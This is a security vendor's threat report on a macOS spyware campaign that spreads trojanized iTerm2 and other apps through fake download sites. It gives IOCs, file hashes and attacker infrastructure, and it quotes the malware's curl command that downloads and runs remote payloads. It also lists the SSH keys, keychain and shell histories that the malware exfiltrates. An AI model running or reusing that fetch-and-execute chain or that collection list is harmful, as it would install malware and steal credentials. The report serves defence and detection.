Earlier this month,a user on Chinese question-and-answer website Zhihu reportedthat a search engine result for the keyword "iTerm2" led to a fake website calleditem2.netthat mimics the legitimateiterm2.com(Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found initerm2.net. When this app is executed, it downloads and runsg.py, a malicious Python script from 47[.]75[.]123[.]111. This malware, which Trend Micro has detected as TrojanSpy.Python.ZURU.A, collects private data from a victim's machine.
Figure 1. The fraudulent website iterm2.net
Objective-see previouslypublished a blog entryabout this malware, which analyzed how the threat actor repacks the iTerm2 app to load the maliciouslibcrypto.2.dylib. This, in turn, downloads and runs other components, including the aforementionedg.pyscript and a Mach-O file called "GoogleUpdate" that contains a Cobalt Strike beacon payload. This blog entry covers the malware's details.
The trojanized appAs of September 15,iterm2.netis still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link,hxxp://www.kaidingle.com/iTerm/iTerm.dmg, from which users are able to download a macOS disk image file (DMG) callediTerm.dmg. The user is redirected to this download URL foriTerm.dmgregardless of the app version the user selects to download from the fake website; the realiterm2.comwebsite has different URLs and files for various versions. The files that are downloaded from the legitimate website come in a ZIP file format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.
Figure 2. The file downloaded from the fake website (left) and the official website (right)
Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:
- All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas files in the legitimate iTerm2.app are code signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is only used to sign an app before the developer delivers it to the App Store, so apps downloaded from the App Store generally don't have an Apple Distribution certificate.
Figure 3. Trojanized iTerm2 app code signing
- The trojanized iTerm2 app contains a file calledlibcrypto.2.dylib(with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.
Figure 4. The libcrypto.2.lib file added in the trojanized iTerm2 app
- In the trojanized iTerm2 app, the main Mach-O file has an additional load command calledLC_LOAD_DYLIBthat loads thelibcrypto.2.dylibfile, shown in Figure 5.
Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib
According to Objective-see's blog post, the malicious codes contained in thelibcrypto.2.dylibfile are executed automatically when the victim runs the trojanized iTerm2 app. This is a clever method for repacking legitimate apps that we have not seen before.
Once executed, the malware connects to its server and receives these instructions from it:
- "curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py && python /tmp/g.py && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate"
- Download theg.pyscript to the folder/tmp/g.pyand execute it
- Download "GoogleUpdate" to the folder/tmp/GoogleUpdateand execute it
- Collect data using theg.pyscript
The Python scriptg.pycollects the following system data and files from the victim's machine, which the script then sends to the server:
- Operating system information
- Username
- Installed applications
- Local IP address
- Copies of these files and folders:
- ~/.bash_history'
- ~/.zsh_history
- ~/.gitConfig
- /etc/hosts
- ~/.ssh
- ~/.zhHistory
- ~/Library/Keychains/Login.keychain-db
- ~/Library/Application Support/VanDyke/SecureCRT/Config/
- ~/Library/Application Support/iTerm2/SavedState/
- The contents of these directories:
- ~/ - {current user home directory}
- ~/Desktop
- ~/Documents
- ~/Downloads
- /Applications
Further analysis of the trojanized iTerm2 app's Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.
Table 1. Other trojanized apps found on VirusTotal
File Name | SHA-256 Hash | Detection |
iTerm.app.zip |
5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0 |
TrojanSpy.MacOS.ZURU.A |
SecureCRT.dmg |
ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132 |
Trojan.MacOS.ZuRu.PFH |
SecureCRT.dmg |
1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921 |
Trojan.MacOS.ZuRu.PFH |
Microsoft Remote Desktop.dmg |
5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259 |
TrojanSpy.MacOS.ZURU.A |
Navicat15_cn.dmg |
6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff |
TrojanSpy.MacOS.ZURU.A |
Navicat15_cn.dmg |
91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e |
TrojanSpy.MacOS.ZURU.A |
Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint thatiterm2.netused revealed several other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.
Figure 6. Other fake websites found on VirusTotal
We were able to access one of these fake websites,snailsvn.cn, but the download link on its page was empty at that time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). However, all of these domains were inaccessible at the time of writing.
Figure 7. The fake SnailSVN website
Download serverThe server used for hosting the trojanized packages,kaidingle[.]com, was registered on September 7, and is currently still active. According to VirusTotal, apart fromiterm.dmg, it also hosts other DMG files such asSecureCTR.dmgandNavicat15_cn.dmg(Figure 8). As of September 18, the latter two DMG files can still be downloaded from the server.
Figure 8. URLs relating with download server
Based on the server's information on WHOIS, a query and response protocol, there are four other domains under the same registrant (Figure 9). However, so far, none of these domains show any indication that they're related to any malware.
Figure 9. Other domains from the same registrant
Second-stage serverVirusTotal recorded multiple URLs related to a second-stage server under the IP address 47[.]75[.]123[.]111 - the same address as that of the maliciousg.pyscript - from September 8 to 17, as shown in Figure 10.
Figure 10. URLs under the second-stage server
Besides theg.pyscript and "GoogleUpdate" components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2).
Table 2. Other Mach-O files hosted in the second-stage server
File Name | SHA-256 Hash | Description/Detection |
la |
79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5 | An open source intranet penetration scanner framework (https://github.com/k8gege/LadonGo) |
iox |
f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f | A tool for port forward and intranet proxy (https://github.com/EddieIvan01/iox) |
netscan-darwin-amd64 |
d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749 | Netscan scans a network for ports that are open on an IP/IP range, and IP addressess that are in use on that network (https://github.com/jessfraz/netscan/releases) |
Host |
a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e |
Backdoor.MacOS.Wirenet.PFH |
Notably, the IP address of the second-stage server is similar to the one "GoogleUpdate" connects to, which is 47[.]75[.]96[.]198. Both of these IP addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were registered around the same time as those in the second-stage server, which suggests that these two servers may have been set up by same threat actor.
Figure 11. URLs under the same server as "GoogleUpdate"
Advertisement sitesAs detailed in the aforementioned user report, the first item from the search engine results is under the subdomainrjxz.jxhwst.top. Searching for this address in Google generates two results that lead only to their cache (Figure 12), and as of this writing, their actual pages are already down.
Figure 12. Google caches of the two fake sites
The first search result, called "Microsoft Remote Desktop," has an address ofhxxp://rjxz.jxhwst.top/3, but based on its cache (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website,hxxp://remotedesktop.vip.
Figure 13. The cache of the fake "Microsoft Remote Desktop" page
Figure 14. The source code of the fake page
Upon checking its main page, we discovered that the second-level domainjxhwst.topbelongs to an agriculture company north of China. Apart from the subdomainrjxz.jxhwst.top, this second-level domain has 44 other subdomains, almost all of which are used for advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising purposes, but cannot prevent them from being used for illegal purposes. If this is the case, the threat actor rents the subdomain for malware distribution.
Figure 15. The subdomains of the agriculture company
Security recommendationsTo protect systems from threats like these, end users should only download apps from official and legitimate marketplaces. They should be careful about the search results from search engines, and always double-check URLs to make sure these really point to the official sites. Mac users can consider multilayered security solutions such asTrend Micro Antivirus for Mac®, which provides enhanced anti-scam protection that flags and blocks scam websites that attempt to steal their personal data. They may also avail of Antivirus for Mac as part ofTrend Micro Maximum Security, a multi-platform solution that offers comprehensive security and multidevice protection against cyberthreats.
Indicators of Compromise (IOCs)File Name | SHA-256 Hash | Detection |
SecureCRT.dmg |
1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921 |
TrojanSpy.MacOS.ZURU.A |
com.microsoft.rdc.macos |
5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259 |
TrojanSpy.MacOS.ZURU.A |
iTerm.app.zip |
5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0 |
TrojanSpy.MacOS.ZURU.A |
Navicat15_cn.dmg |
6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff |
TrojanSpy.MacOS.ZURU.A |
Navicat15_cn.dmg |
91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e |
TrojanSpy.MacOS.ZURU.A |
SecureCRT.dmg |
ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132 |
TrojanSpy.MacOS.ZURU.A |
iTerm.dmg |
e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa |
TrojanSpy.MacOS.ZURU.A |
Microsoft Remote Desktop.dmg |
4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
4aece9a7d73c1588ce9441af1df6856d8e788143cd9e53a2e9cf729e23877343 |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
62cae3c971ed01c61454e4c3d9a8439cdcb409a8e1c5641e5c7c4ac7667cb5e5 |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
aba7c61d2c16cdae17785a38b070df57aa3009f00686881642be31a589fabe0a |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
af2cb957387b7c4b0c5c9fa24a711988c9e8802e758622b321c9bdc5720120d2 |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
e8184e1169373e2d529f23b9842f258dddc1d24c77ced0d12b08959967dfadef |
TrojanSpy.MacOS.ZURU.A |
libcrypto.2.dylib |
2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef |
TrojanSpy.MacOS.ZURU.A |
g.py |
ffb0a802fdf054d4988d68762d9922820bdc3728f0378fcd6c4ed28c06da5cf0 |
TrojanSpy.Python.ZURU.A |
MITRE Tactics, Techniques, and Procedures (TTPs)
Tactic | ID | Name | Description |
Initial Access | T1566.002 | Spearphishing Link |
Phishing website from search engine results |
Execution | T1059.006 | Python |
Downloads Python script |
T1204.002 | Malicious File |
Executes the repackaged iTerm2 app will launch the malwaredylib libcrypt.2.dylib | |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Strings in malwaredylibare AES and Base64 encoded |
T1036 | Masquerading (6) |
Malware is a malware dylib inserted in a repackaged iterm2 app | |
Collection | T1560.002 | Archive via Library |
Collects various information and adds it to zip archive |
T1005 | Data from Local System |
Collects system information, bash history and login keychain information | |
T1602 | Data from Configuration Repository (2) |
Collects contents of /Library/Application Support/VanDyke/SecureCRT/Config | |
Exfiltration |
T1041 | Exfiltration Over C2 Channel |
Files are exfiltrated to hxxp://47[.]75[.]123[.]111/u.php |
Attachments
- Original document
- Permalink
Disclaimer
Trend Micro Inc. published this content on 30 September 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 30 September 2021 13:21:10 UTC.